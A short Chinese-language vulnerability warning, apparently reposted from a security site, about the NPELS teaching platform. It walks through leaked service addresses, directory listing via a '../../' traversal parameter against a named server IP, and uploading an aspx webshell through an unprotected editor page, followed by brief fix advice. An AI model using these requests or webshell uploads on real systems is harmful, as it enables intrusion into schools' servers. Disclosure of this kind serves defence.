新理念外语网络教学平台文件上传及修复方案漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    信息泄露和权限不严导致列目录及上传

    以某大学的为例:

    http://www.myhack58.com /NPELS

    NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址

   

    http://222.30.60.3/NPELS/CommonService.asmx

    及版本号

   

   

    直接访问

    http://222.30.60.3/NPELS/CommonService.asmx

    使用GetTestClientFileList操作,直接 HTTP GET 列目录:

    http://www.myhack58.com /NPELS/CommonService.asmx/GetTestClientFileList?version=1, 0, 0, 2187

    进一步列目录(返回的网页很大,可以直接 wget 下来)

    http://xxx/NPELS/CommonService.asmx/GetTestClientFileList?version=../../

    发现

    http:/xxx/npelsv/editor/editor.htm可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头

    上传后继续列目录找到木马地址直接访问即可

    OOXX

    修复方案:

    好像考试系统必须使用 CommonService.asmx

    最好配置文件加密或者用别的方式不让它泄露出来

    并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样

最新文章